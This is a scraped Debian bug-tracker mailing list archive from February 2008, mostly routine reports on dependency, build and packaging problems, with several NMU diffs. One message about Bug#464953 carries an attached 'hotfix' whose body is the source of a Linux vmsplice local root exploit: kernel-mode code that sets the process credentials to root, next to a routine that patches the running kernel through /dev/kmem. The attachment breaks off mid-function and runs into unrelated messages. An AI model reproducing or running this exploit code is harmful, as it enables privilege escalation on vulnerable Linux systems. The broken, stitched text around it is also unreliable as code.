ii  libxt6   1:1.0.5-3   X11 toolkit intrinsics library
ii  wodim9:1.1.6-1   command line CD/DVD writing tool
ii  zlib1g   1:1.2.3.3.dfsg-11   compression library - runtime

Versions of packages k3b recommends:
ii  dvd+rw-tools7.0-9DVD+-RW/R tools
ii  kcontrol4:3.5.8.dfsg.1-7 control center for KDE
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE
ii  vcdimager   0.7.23-4 A VideoCD (VCD) image mastering an

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#464953: Amd64 hotfix

2008-02-11 Thread Kyle McMartin
On Mon, Feb 11, 2008 at 01:54:35PM -0500, Ivan Jager wrote:
> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.
>

these "hotfixes" are so completely wrong, it's not even funny.
you're playing russian roulette with the return value.

   0:   b8 da ff ff ff  mov$0xffda,%eax
   5:   c3  retq   

is more correct (return -ENOSYS)

regards, kyle



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#464953: Amd64 hotfix

2008-02-11 Thread Ivan Jager
I modified the hotfix so it will also patch compat_sys_vmsplice, which 
would be important on amd64 boxen with x86 compatibility enabled.


It's attached, or if for some reason it doesn't make it through, you can 
fetch it from 
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c


Ivan/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __KERNEL__
#include 

#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

voidexit_code();
charexit_stack[1024 * 1024];

voiddie(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

voidkernel_code()
{
int i;
uint*p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}   

exit_kernel();
}

voidde_exploit()
{
  char line[4096];
  FILE* ksyms = fopen("/proc/kallsyms", "r");
  size_t address = 0;
  size_t compat_address = 0;

  if(!ksyms)
  {
perror("Could not open /proc/kallsyms");

exit(EXIT_FAILURE);
  }

  while(fgets(line, sizeof(line), ksyms))
  {
if(strstr(line, " sys_vmsplice"))
{
  sscanf(line, "%zx", &address);
}
if(strstr(line, " compat_sys_vmsplice"))
{
  sscanf(line, "%zx", &compat_address);
}
  }

  if(!address)
  {
fprintf(stderr, "Address not found\n");

exit(EXIT_FAILURE);
  }

  int fd = open("/dev/kmem", O_RDWR);

  if(fd == -1)
  {
perror("open(\"/dev/kmem\")");

exit(EXIT_FAILURE);
  }

  char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd, address 
& ~0xFFF);

  if(map == MAP_FAILED)
  {
perror("mmap");

exit(EXIT_FAILURE);
  }

  map[address & 0xfff] = 0xc3; /* 0xC3 = RET */


  if (compat_address) {
printf("Patched sys_vmsplice, now patching compat_sys_vmsplice\n");
char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 
compat_address & ~0xFFF);

if(map == MAP_FAILED)
{
  perror("mmap");

  exit(EXIT_FAILURE);
}

Bug#465177: FTBFS: configure: error: unable to configure inotify support

2008-02-11 Thread Andres Mejia
On Monday 11 February 2008 6:14:31 am Sergey 'Jin' Bostandzhyan wrote:
> Hi,
>
> I'm one of the authors of MediaTomb, here is some info on this:
>
> do not pass the --enable-inotify parameter to the configure script;
> presence of inotify will be detected automatically, if not available it
> will be disabled on the fly. However, when the --enable-inotify parameter
> is passed by the user, configure will abort with the error that you are
> seeing if inotify checks fail.

This is done on purpose so that no package on a different architecture/kernel 
builds packages sucessfully with a different set of options enabled, else I'm 
sure there would be a different set of bugs sooner or later. The inotify 
option is not enabled for any non-linux kernel using machine.

The parameters passed to the configure script can be manually overridden by a 
user, but they won't be for the buildd machines.

> What I still need to do is, to adapt the inotify check for cross compiling,
> right now it will always fail when cross compiled.

Actually, no cross compiling is done. The powerpc buildd machine is a powerpc 
machine. The same goes for the other buildd machines.

> I hope that info helps.
>
> Kind regards,
> Jin



-- 
Regards,
Andres



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#459281: Still present with recent gcj

2008-02-11 Thread Vincent Fourmond

  Hello,

Michael Koch wrote:
> On Mon, Feb 04, 2008 at 10:19:26AM +0100, Vincent Fourmond wrote:
>>   For information, libjfreechart-java still does not work with gcj
>> 4.3-20080202-1.
> 
> I have tested 4.3-20080116-1 and 4.3-20080202-1 locally and both worked.
> The generated image is slightly different to the one generated by SUN
> but that was to be expected.
>
> I wonder if you missed the libgcj9-0-awt package in your installation?

  Unfortunately, not. I checked again, specifically including the awt
library in the classpath (at run-time, does not seem to work at
build-time), and I still get a garbled output. Are you using an amd64
architecture ? Could that be a 64bits-only problem ?

  Cheers,

Vincent, sorry that it does not work better.

-- 
Vincent Fourmond, Debian Developer
http://vince-debian.blogspot.com/
-- pretty boring signature, isn't it ?



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465259: same problem with file size viewer, kontrol fonts, kdirstat

2008-02-11 Thread Huahai Yang
Hi,

I can confirm this "undefined symbol: lstat64" bug with ktorrent and 
kcm_fonts. It also affects these applicaitons too:

* File Size Viewer
* kdirstat





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: setting package to gok gok-doc, tagging 441705, tagging 460863

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.15
> package gok gok-doc
Ignoring bugs not assigned to: gok gok-doc

> tags 441705 + pending
Bug#441705: gok: package content changed if build twice or more times in a row
Tags were: upstream
Tags added: pending

> tags 460863 + pending
Bug#460863: gok: FTBFS on non-linux systems
Tags were: patch
Tags added: pending

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#461035: marked as done (prime: uninstallable: Depends: ruby (< 1.9))

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 17:47:06 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#461035: fixed in prime 1.0.0.1-1.1
has caused the Debian Bug report #461035,
regarding prime: uninstallable: Depends: ruby (< 1.9)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
461035: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461035
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: prime
Version: 1.0.0.1-1
Severity: serious

Hi,

  prime: Depends: ruby (< 1.9) but 4 is to be installed

ruby switched to a versioninig scheme which avoids confusing with the
"real" ruby version. Please Depends on ruby1.8 instead of depending on
ruby (<1.9) (which is wrong, btw. You probably meant << 1.9).

Thank you,
-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |


--- End Message ---
--- Begin Message ---
Source: prime
Source-Version: 1.0.0.1-1.1

We believe that the bug you reported is fixed in the latest version of
prime, which is due to be installed in the Debian FTP archive:

prime_1.0.0.1-1.1.diff.gz
  to pool/main/p/prime/prime_1.0.0.1-1.1.diff.gz
prime_1.0.0.1-1.1.dsc
  to pool/main/p/prime/prime_1.0.0.1-1.1.dsc
prime_1.0.0.1-1.1_all.deb
  to pool/main/p/prime/prime_1.0.0.1-1.1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Lucas Nussbaum <[EMAIL PROTECTED]> (supplier of updated prime package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 18:36:52 +0100
Source: prime
Binary: prime
Architecture: source all
Version: 1.0.0.1-1.1
Distribution: unstable
Urgency: high
Maintainer: Hidetaka Iwai <[EMAIL PROTECTED]>
Changed-By: Lucas Nussbaum <[EMAIL PROTECTED]>
Description: 
 prime  - Japanese PRedictive Input Method Editor
Closes: 461035
Changes: 
 prime (1.0.0.1-1.1) unstable; urgency=high
 .
   * Non-maintainer upload to fix RC bug.
   * Instead of using a versioned dependancy on ruby, use a non-versioned one,
 and build-conflicts with ruby1.9. A better fix would be to use "ruby1.8"
 instead of "ruby" everywhere, but that's harder to do. The result is
 that when Debian will switch to ruby1.9 by default, prime will fail to
 build, and we can start working on porting it to ruby1.9. Closes: #461035.
Files: 
 b42617e740b1c98a963937f7cda3033f 663 text optional prime_1.0.0.1-1.1.dsc
 8b9ca63393ce6327bc46cdde678b34cd 3360 text optional prime_1.0.0.1-1.1.diff.gz
 5275b5b469c57b46de0e0da219e9c335 145776 text optional prime_1.0.0.1-1.1_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsImk2hliNwI7P08RAi8eAJ9ZFS+EYOJxnjG7UZzSacHOIey3ywCgpJxv
wEtkSHbJjnks0aSYt565J/4=
=9AKB
-END PGP SIGNATURE-


--- End Message ---


Bug#465230: cannot install package

2008-02-11 Thread Rubén Porras
2008/2/11, Joachim Breitner <[EMAIL PROTECTED]>:
> Hi,
>
> Am Montag, den 11.02.2008, 17:15 +0100 schrieb Rubén Porras:
> > 2008/2/11, Joachim Breitner <[EMAIL PROTECTED]>:
> > > Hi,
> > >
> > > sorry for the bug, it was a little mistake with the dependencies. Fixed
> > > version is being uploaded.
> > >
> > > If you have trouble removing the package, try to remove
> > > the /lib/dpkg/info/libghc6-xmonad-contrib-dev.postrm file before trying
> > > to remove it, it might help.
> > >
> >
> > I think they are still wrong, there is no xmonad-contrib-0.6 provided
> > by the xmonad-contrib source package.
>
> Note that the referred xmonad-contrib-0.6 is not a Debian package but a
> haskell (ghc-pkg) package...
>

Which is not available.  And I can't do anything but remove the
packages with a --force-all option. Is there any way te fake ghc-pkg
on this matter? Because installing
libghc6-x11-dev_1.4.1-0.nomeata3_i386.deb does not solve the problem.

cheers.


Bug#461035: prime: diff for NMU version 1.0.0.1-1.1

2008-02-11 Thread Lucas Nussbaum
tags 461035 + patch
thanks

Hi,

Attached is the diff for my prime 1.0.0.1-1.1 NMU.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |
diff -u prime-1.0.0.1/debian/control prime-1.0.0.1/debian/control
--- prime-1.0.0.1/debian/control
+++ prime-1.0.0.1/debian/control
@@ -3,12 +3,13 @@
 Priority: optional
 Maintainer: Hidetaka Iwai <[EMAIL PROTECTED]>
 Uploaders: Masahito Omote <[EMAIL PROTECTED]>
-Build-Depends-Indep: debhelper (>> 4.0.0), dpatch, ruby (>= 1.8), ruby (<< 1.9)
+Build-Depends-Indep: debhelper (>> 4.0.0), dpatch, ruby1.8, ruby
+Build-Conflicts: ruby1.9
 Standards-Version: 3.6.1
 
 Package: prime
 Architecture: all
-Depends: ruby (>= 1.8), ruby (<< 1.9), ruby1.8, libprogressbar-ruby1.8, libsuikyo-ruby1.8 (>= 2.0.0.1), libsary-ruby1.8, prime-dict
+Depends: ruby, ruby1.8, libprogressbar-ruby1.8, libsuikyo-ruby1.8 (>= 2.0.0.1), libsary-ruby1.8, prime-dict
 Description: Japanese PRedictive Input Method Editor
  PRIME is Japanese PRedictive Input  Method Editor.
  PRIME predicts the user's input using knowledge of natural
diff -u prime-1.0.0.1/debian/changelog prime-1.0.0.1/debian/changelog
--- prime-1.0.0.1/debian/changelog
+++ prime-1.0.0.1/debian/changelog
@@ -1,3 +1,14 @@
+prime (1.0.0.1-1.1) unstable; urgency=high
+
+  * Non-maintainer upload to fix RC bug.
+  * Instead of using a versioned dependancy on ruby, use a non-versioned one,
+and build-conflicts with ruby1.9. A better fix would be to use "ruby1.8"
+instead of "ruby" everywhere, but that's harder to do. The result is
+that when Debian will switch to ruby1.9 by default, prime will fail to
+build, and we can start working on porting it to ruby1.9. Closes: #461035.
+
+ -- Lucas Nussbaum <[EMAIL PROTECTED]>  Mon, 11 Feb 2008 18:36:52 +0100
+
 prime (1.0.0.1-1) unstable; urgency=low
 
   * New upstream release


Processed: prime: diff for NMU version 1.0.0.1-1.1

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 461035 + patch
Bug#461035: prime: uninstallable: Depends: ruby (< 1.9)
Tags were: sid
Tags added: patch

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465044: the whole system freezes when clicking on a link in pidgin

2008-02-11 Thread Ari Pollak
Does it actually freeze, or can you get to a console with
Ctrl-Alt-F1? If your browser when starting pidgin from a
terminal is links2, then it's probably the same as starting
pidgin from outside a terminal. What is the browser set to in
pidgin's preferences under the Network tab?

On Mon, Feb 11, 2008 at 10:34:42AM +0100, henry atting wrote:
> It means that everyting freezes, the only thing that is left to do is to
> shut down with the power button of my notebook. 
> 
> Whereas if I start pidgin from a terminal it is quite different. When
> clicking on a link the default www-browser (links2) is opened
> within the terminal and everything works fine. 
> My default x-www-browser is iceweasel by the way.




Bug#460742: marked as done (uninstallable)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 17:32:03 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#460742: fixed in kazehakase 0.4.3-1.2
has caused the Debian Bug report #460742,
regarding uninstallable
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
460742: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=460742
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kazehakase
Version: 0.4.3-1.1
Severity: grave

$ sudo apt-get install kazehakase
Reading package lists... Done
Building dependency tree   
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.

Since you only requested a single operation it is extremely likely that
the package is simply not installable and a bug report against
that package should be filed.
The following information may help to resolve the situation:

The following packages have unmet dependencies.
  kazehakase: Depends: ruby (< 1.9.0) but 4 is to be installed
E: Broken packages

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.23-1-686 (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash


--- End Message ---
--- Begin Message ---
Source: kazehakase
Source-Version: 0.4.3-1.2

We believe that the bug you reported is fixed in the latest version of
kazehakase, which is due to be installed in the Debian FTP archive:

kazehakase_0.4.3-1.2.diff.gz
  to pool/main/k/kazehakase/kazehakase_0.4.3-1.2.diff.gz
kazehakase_0.4.3-1.2.dsc
  to pool/main/k/kazehakase/kazehakase_0.4.3-1.2.dsc
kazehakase_0.4.3-1.2_i386.deb
  to pool/main/k/kazehakase/kazehakase_0.4.3-1.2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Lucas Nussbaum <[EMAIL PROTECTED]> (supplier of updated kazehakase package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 10:34:56 +0100
Source: kazehakase
Binary: kazehakase
Architecture: source i386
Version: 0.4.3-1.2
Distribution: unstable
Urgency: high
Maintainer: Hidetaka Iwai <[EMAIL PROTECTED]>
Changed-By: Lucas Nussbaum <[EMAIL PROTECTED]>
Description: 
 kazehakase - gecko based web browser using GTK
Closes: 460742
Changes: 
 kazehakase (0.4.3-1.2) unstable; urgency=high
 .
   * Non-maintainer upload to fix RC bug.
   * Depend (and use) on ruby1.8, not ruby. Closes: #460742.
Files: 
 822e84d5e52e2185a32c104db58d1354 767 web optional kazehakase_0.4.3-1.2.dsc
 d2a7beb0f46a4abf4c24147da9a8033a 14384 web optional 
kazehakase_0.4.3-1.2.diff.gz
 3d82e91b6b148b45f144d9102a68901f 746134 web optional 
kazehakase_0.4.3-1.2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsIM42hliNwI7P08RAmoAAJ9GEGAug+aOHLCR3y/GiCozU9c66ACdGGQ3
ol9ML33NUMC3AQnpeM9pOYo=
=W+J/
-END PGP SIGNATURE-


--- End Message ---


Processed: kazehakase: diff for NMU version 0.4.3-1.2

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 460742 + patch
Bug#460742: uninstallable
Tags were: sid
Tags added: patch

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#460742: kazehakase: diff for NMU version 0.4.3-1.2

2008-02-11 Thread Lucas Nussbaum
tags 460742 + patch
thanks

Hi,

Attached is the diff for my kazehakase 0.4.3-1.2 NMU.
-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |
diff -u kazehakase-0.4.3/debian/control kazehakase-0.4.3/debian/control
--- kazehakase-0.4.3/debian/control
+++ kazehakase-0.4.3/debian/control
@@ -2,7 +2,7 @@
 Section: web
 Priority: optional
 Maintainer: Hidetaka Iwai <[EMAIL PROTECTED]>
-Build-Depends: automake1.7, libtool, debhelper(>> 4.0.0), dpatch, libatk1.0-dev, libglib2.0-dev, libgtk2.0-dev, libpango1.0-dev, libxul-dev, libgnutls-dev (>= 1.2.6), ruby (>=1.8.0), ruby(<< 1.9.0), ruby1.8-dev, libgtk2-ruby, libgettext-ruby1.8
+Build-Depends: automake1.7, libtool, debhelper(>> 4.0.0), dpatch, libatk1.0-dev, libglib2.0-dev, libgtk2.0-dev, libpango1.0-dev, libxul-dev, libgnutls-dev (>= 1.2.6), ruby1.8, ruby1.8-dev, libgtk2-ruby, libgettext-ruby1.8
 Standards-Version: 3.7.2
 
 Package: kazehakase
@@ -10,7 +10,7 @@
 Suggests: migemo
 Recommends: hyperestraier
 Provides: www-browser
-Depends: ${shlibs:Depends}, ruby (>= 1.8.0), ruby (<< 1.9.0), libgtk2-ruby, libgettext-ruby1.8
+Depends: ${shlibs:Depends}, ruby1.8, libgtk2-ruby, libgettext-ruby1.8
 Conflicts: kazehakase-migemo
 Description: gecko based web browser using GTK
  Kazehakase is a web browser using Gecko as HTML rendering engine.
diff -u kazehakase-0.4.3/debian/changelog kazehakase-0.4.3/debian/changelog
--- kazehakase-0.4.3/debian/changelog
+++ kazehakase-0.4.3/debian/changelog
@@ -1,3 +1,10 @@
+kazehakase (0.4.3-1.2) unstable; urgency=high
+
+  * Non-maintainer upload to fix RC bug.
+  * Depend (and use) on ruby1.8, not ruby. Closes: #460742.
+
+ -- Lucas Nussbaum <[EMAIL PROTECTED]>  Mon, 11 Feb 2008 10:34:56 +0100
+
 kazehakase (0.4.3-1.1) unstable; urgency=low
 
   * Non-maintainer upload to fix RC bug.


Processed: severity of 464195 is serious

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.15
> severity 464195 serious
Bug#464195: hold ocaml in sid
Severity set to `serious' from `grave'

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465055: php-ps: FTBFS: libgd2-dev not available anymore.

2008-02-11 Thread Uwe Steinmann
On Sun, Feb 10, 2008 at 01:32:40PM +0100, Kurt Roeckx wrote:
> Package: php-ps
> Version: 1.3.6-2
> Severity: serious
> 
> Hi,
> 
> You have a build dependency on:
> libgd2-dev (>> 2.0.0) | libgd2-xpm-dev (>> 2.0.0) | libgd2-noxpm-dev (>> 
> 2.0.0)
> 
> The buildd's will only consider the first of those, and then fail.
> You'll want to remove that part.
Is this specific for the buildds or the above dependency line
in general the wrong approach?

  Uwe 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465287: libselinux: selinux_default_type_path implicitly converted to pointer

2008-02-11 Thread dann frazier
Package: libselinux
Version: 2.0.35-1
Severity: serious
Usertags: implicit-pointer-conversion

Our automated buildd log filter[1] detected a problem that is likely to
cause your package to segfault on architectures where the size of a
pointer is greater than the size of an integer, such as ia64 and amd64.

  Function `selinux_default_type_path' implicitly converted to pointer at 
selinuxswig_wrap.c:7457
  Function `selinux_default_type_path' implicitly converted to pointer at 
selinuxswig_wrap.c:7457

This is often due to a missing function prototype definition.
For more information, see [2].

Inasmuch as the ia64 porters are now treating all such pointer conversions
as build failures, this is actually a "serious" bug because the package now
"fails to build" on an architecture where it built before.

Unfortunately, I don't know much about swig, so am unable to provide a
patch for this issue.

[1] http://people.debian.org/~dannf/check-implicit-pointer-functions
[2] http://wiki.debian.org/ImplicitPointerConversions




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465230: cannot install package

2008-02-11 Thread Joachim Breitner
Hi,

Am Montag, den 11.02.2008, 17:15 +0100 schrieb Rubén Porras:
> 2008/2/11, Joachim Breitner <[EMAIL PROTECTED]>:
> > Hi,
> >
> > sorry for the bug, it was a little mistake with the dependencies. Fixed
> > version is being uploaded.
> >
> > If you have trouble removing the package, try to remove
> > the /lib/dpkg/info/libghc6-xmonad-contrib-dev.postrm file before trying
> > to remove it, it might help.
> >
> 
> I think they are still wrong, there is no xmonad-contrib-0.6 provided
> by the xmonad-contrib source package.

Note that the referred xmonad-contrib-0.6 is not a Debian package but a
haskell (ghc-pkg) package...

> The output now is:

Yes, thats the kind of problem I expected:

> (Reading database ... 189883 files and directories currently installed.)
> Preparing to replace libghc6-xmonad-contrib-dev 0.6-1 (using
> .../libghc6-xmonad-contrib-dev_0.6-2_i386.deb) ...
> ghc-pkg: cannot find package xmonad-contrib-0.6
> dpkg: warning - old pre-removal script returned error exit status 1

You have the old package partially installed. When you remove it, the
postrm script is run, which calls ghc-pkg, which tries to unregister the
xmonad-contrib-0.6 _haskell_ package from your system. This does not
exist, so ghc-pkg flags an error, dpkg aborts and the broken package is
not removed.

> dpkg - trying script from the new package instead ...
> ghc-pkg: cannot find package xmonad-contrib-0.6
> dpkg: error processing /tmp/libghc6-xmonad-contrib-dev_0.6-2_i386.deb
> (--install):
>  subprocess new pre-removal script returned error exit status 1

No dpkg tries the postrm script in the new package, but this fails as
well..

> Reading package info from stdin ... done.
> ghc-pkg: dependency X11-1.4.1 doesn't exist (use --force to override)
> dpkg: error while cleaning up:
>  subprocess post-installation script returned error exit status 1

dpkg tries to clean up the mess by running the postinst script from the
package that it can not remove, to at least have it installed properly,
but this fails because you don’t have libghc6-x11-dev in the required
version.

> Errors were encountered while processing:
>  /tmp/libghc6-xmonad-contrib-dev_0.6-2_i386.deb

I assume you were installing the new package directly with dpkg -i?
Because with other tools, you would have been warned that the new
package does correctly depend on libghc6-x11-dev (>= 1.4.1). 

This version is not yet officially uploaded, but I’m providing a private
build on
http://people.debian.org/~nomeata/xmonad/libghc6-x11-dev_1.4.1-0.nomeata3_i386.deb

Please install this package and then try to install the new
libghc6-xmonad-contrib-dev package. This way, you should get rid of the
installations errors (I hope).

Sorry for the inconvenience, and thanks for testing the packages,

Joachim

> 
-- 
Joachim "nomeata" Breitner
Debian Developer
  [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata


signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil


Bug#465285: libmpich1.0gf -- package empty.

2008-02-11 Thread Kumar Appaiah
Package: libmpich1.0gf
Version: 1.2.7-6
Severity: serious
Tags: patch

Hi!

I noticed that the libmpich1.0gf package is empty! Please find
attached a simple patch to set the right install directories in
debian/rules.

If I got something wrong, please excuse me.

Thanks.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036
diff -u mpich-1.2.7/debian/rules mpich-1.2.7/debian/rules
--- mpich-1.2.7/debian/rules
+++ mpich-1.2.7/debian/rules
@@ -176,7 +176,7 @@
 	)
 	# install libs to proper places.
 	(set -e; for INST in mpich mpich-mpd mpich-shmem ; do \
-	  $(INSTALL_DIR) debian/lib"$$INST"1.0ldbl/usr/lib/$$INST/lib/shared; \
+	  $(INSTALL_DIR) debian/lib"$$INST"1.0gf/usr/lib/$$INST/lib/shared; \
 	  $(INSTALL_DIR) debian/lib"$$INST"1.0-dev/usr/lib/$$INST/bin; \
 	  $(INSTALL_DIR) debian/lib"$$INST"1.0-dev/usr/lib/$$INST/etc; \
 	  $(INSTALL_DIR) debian/lib"$$INST"1.0-dev/usr/lib/$$INST/man/man1; \
@@ -187,9 +187,9 @@
 	  mv debian/$$INST-bin/usr/lib/$$INST/include debian/lib"$$INST"1.0-dev/usr/lib/$$INST/; \
 	  mv debian/$$INST-bin/usr/lib/$$INST/lib debian/lib"$$INST"1.0-dev/usr/lib/$$INST/; \
 	  mv debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/lib*.so.1.0 debian/lib"$$INST"1.0-dev/usr/lib/$$INST/lib/shared/; \
